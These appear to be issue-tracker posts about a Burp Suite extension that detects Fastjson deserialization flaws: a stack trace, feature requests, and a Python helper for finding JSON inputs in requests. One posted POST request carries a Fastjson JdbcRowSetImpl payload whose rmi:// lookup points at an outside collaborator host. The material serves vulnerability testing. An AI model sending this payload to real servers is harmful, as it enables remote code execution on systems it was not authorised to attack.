at java.desktop/java.awt.EventQueue.dispatchEventImpl(EventQueue.java:770)
at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:721)
at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:715)
at java.base/java.security.AccessController.doPrivileged(AccessController.java:391)
at java.base/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(ProtectionDomain.java:85)
at java.desktop/java.awt.EventQueue.dispatchEvent(EventQueue.java:740)
at java.desktop/java.awt.EventDispatchThread.pumpOneEventForFilters(EventDispatchThread.java:203)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForFilter(EventDispatchThread.java:124)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForHierarchy(EventDispatchThread.java:113)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:109)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:101)
at java.desktop/java.awt.EventDispatchThread.run(EventDispatchThread.java:90)
java.lang.NullPointerException
at burp.h9h.a(Unknown Source)
at burp.e3b.getHttpService(Unknown Source)
at burp.g65.getHttpService(Unknown Source)
at burp.BurpExtender$MarkInfoTab.isEnabled(BurpExtender.java:346)
at burp.gcc.a(Unknown Source)
at burp.dwz.a(Unknown Source)
at burp.dwz.a(Unknown Source)
at burp.co7.b(Unknown Source)
at burp.efw.a(Unknown Source)
at burp.dwz.addNotify(Unknown Source)
at java.desktop/java.awt.Container.addNotify(Container.java:2800)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783)
at java.desktop/java.awt.Container.addNotify(Container.java:2800)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783)
at java.desktop/java.awt.Container.addNotify(Container.java:2800)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783)
at java.desktop/java.awt.Container.addNotify(Container.java:2800)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783)
at java.desktop/java.awt.Container.addImpl(Container.java:1146)
at java.desktop/javax.swing.JTabbedPane.insertTab(JTabbedPane.java:754)
at burp.a3b.a(Unknown Source)
at burp.a3b.insertTab(Unknown Source)
at java.desktop/javax.swing.JTabbedPane.addTab(JTabbedPane.java:828)
at burp.fz9.a(Unknown Source)
at burp.co7.b(Unknown Source)
at burp.co7.c(Unknown Source)
at burp.avq.a(Unknown Source)
at burp.aqd.addSuiteTab(Unknown Source)
at burp.lq.addSuiteTab(Unknown Source)
at burp.a3i.addSuiteTab(Unknown Source)
at burp.BurpExtender$1.run(BurpExtender.java:112)
at java.desktop/java.awt.event.InvocationEvent.dispatch(InvocationEvent.java:316)
at java.desktop/java.awt.EventQueue.dispatchEventImpl(EventQueue.java:770)
at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:721)
at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:715)
at java.base/java.security.AccessController.doPrivileged(AccessController.java:391)
at java.base/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(ProtectionDomain.java:85)
at java.desktop/java.awt.EventQueue.dispatchEvent(EventQueue.java:740)
at java.desktop/java.awt.EventDispatchThread.pumpOneEventForFilters(EventDispatchThread.java:203)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForFilter(EventDispatchThread.java:124)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForHierarchy(EventDispatchThread.java:113)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:109)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:101)
at java.desktop/java.awt.EventDispatchThread.run(EventDispatchThread.java:90)

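It throws errors as soon as it loads. Other people can detect the issue with the same request packet, but I cannot. Version 2020.12.1, Win10.

Switching to other versions gives the same result.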

[feature request] Improve the output

For example, entries such as request no json and request json no eligible could be collapsed or hidden, or written to the log instead of being shown in the UI.

DNS platform issue

I don't know why, but the configuration file says dnslog.cn is used, while the logger shows that the scan uses an oastify.com domain.

Feature request

Requests that pass parameters like this are not detected:

https://test.baidu.com:443/post_server/nptts?message=%7B%22text%22:%221111%22,%22speakerid%22:0,%22type%22:%221%22,%22vol%22:%220.7%22%7D

Or a POST:

POST /sss/sss HTTP/1.1
Host: test.baidu.com
Connection: close
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://test.baidu.com/sss/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 240

message={"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"f":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://a5gx8q8rbj06ug75b78wihfmyd43ss.burpcollaborator.net/hello","autoCommit":true}}, "poc":11}

Manual test with Burp + dnslog: [screenshot]
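The two request shapes in this issue, JSON percent-encoded in a GET parameter and JSON inside a form-encoded POST parameter, can both be recognised by decoding each parameter value before testing whether it parses as JSON. The following Python is an added example, not code from BurpFastJsonScan; `is_json`, `find_json_inputs`, and the sample form body and cookie are constructed for illustration.

```python
import json
from urllib.parse import parse_qsl, unquote, urlsplit


def is_json(value):
    """True if value parses strictly as a JSON object or array."""
    text = value.strip()
    try:
        return text.startswith(("{", "[")) and isinstance(json.loads(text), (dict, list))
    except ValueError:
        return False


def find_json_inputs(url, headers, body=""):
    """Return (location, name) for every request input that carries JSON."""
    hdrs = {k.lower(): v for k, v in headers.items()}
    hits = []
    # GET parameters: parse_qsl percent-decodes each value before the check.
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if is_json(value):
            hits.append(("query", name))
    ctype = hdrs.get("content-type", "").split(";")[0].strip().lower()
    if ctype == "application/x-www-form-urlencoded":
        # POST parameters: the JSON may arrive raw or percent-encoded.
        for name, value in parse_qsl(body, keep_blank_values=True):
            if is_json(value):
                hits.append(("form", name))
    elif is_json(body):
        # The whole body is JSON and has no parameter name.
        hits.append(("body", ""))
    # Cookie values are split by hand and percent-decoded.
    for pair in hdrs.get("cookie", "").split(";"):
        name, _, value = pair.strip().partition("=")
        if name and is_json(unquote(value)):
            hits.append(("cookie", name))
    return hits


# URL taken from the issue above; headers, cookie and body are constructed samples.
GET_URL = ("https://test.baidu.com:443/post_server/nptts?message=%7B%22text%22:"
           "%221111%22,%22speakerid%22:0,%22type%22:%221%22,%22vol%22:%220.7%22%7D")
FORM_HEADERS = {"Content-Type": "application/x-www-form-urlencoded",
                "Cookie": "sid=abc123; prefs=%7B%22theme%22%3A%22dark%22%7D"}
FORM_BODY = 'message={"text":"1111","type":"1"}&page=2'

if __name__ == "__main__":
    print(find_json_inputs(GET_URL, {}))
    print(find_json_inputs("https://test.baidu.com/sss/sss", FORM_HEADERS, FORM_BODY))
```

`json.loads` is strict: the `message` value in the POST quoted above has an unbalanced closing brace before `"poc"`, so this check would not flag that request as JSON.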

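Detection mechanism

Could the detection mechanism instead decide based on whether the response is "JSON or XML"? That would be more accurate, because some sites' endpoints take no parameters by default, and those are missed this way.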
